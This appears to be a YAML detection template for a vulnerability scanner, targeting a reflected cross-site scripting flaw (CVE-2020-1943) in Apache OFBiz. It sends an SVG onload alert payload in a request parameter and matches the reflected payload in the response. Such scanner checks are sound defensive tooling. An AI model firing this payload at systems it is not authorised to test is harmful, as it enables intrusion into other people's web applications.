28 lines
499 B
YAML
28 lines
499 B
YAML
id: CVE-2020-1943
|
|
|
|
info:
|
|
name: Apache OFBiz Reflected XSS
|
|
author: pd-team
|
|
severity: medium
|
|
tags: cve,cve2020,apache,xss
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/control/stream?contentId=<svg/onload=alert(1)>'
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
words:
|
|
- "<svg/onload=alert(1)>"
|
|
part: body
|
|
|
|
- type: word
|
|
words:
|
|
- "text/html"
|
|
part: header
|
|
|
|
- type: status
|
|
status:
|
|
- 200 |